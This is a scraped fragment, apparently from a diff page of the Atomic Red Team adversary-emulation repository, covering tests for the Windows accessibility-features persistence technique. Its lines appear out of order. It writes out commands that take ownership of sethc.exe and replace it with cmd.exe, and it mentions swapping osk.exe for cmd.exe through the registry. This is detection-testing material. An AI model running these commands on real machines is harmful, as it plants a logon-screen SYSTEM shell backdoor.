icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
'
name: command_prompt
elevation_required: true
T1504:
technique:
x_mitre_platforms:
atomics/T1546.008/T1546.008.md
-1
View File
@@ -27,7 +27,6 @@ Other accessibility features exist that may also be leveraged in a similar fashi
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes
Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
**Supported Platforms:** Windows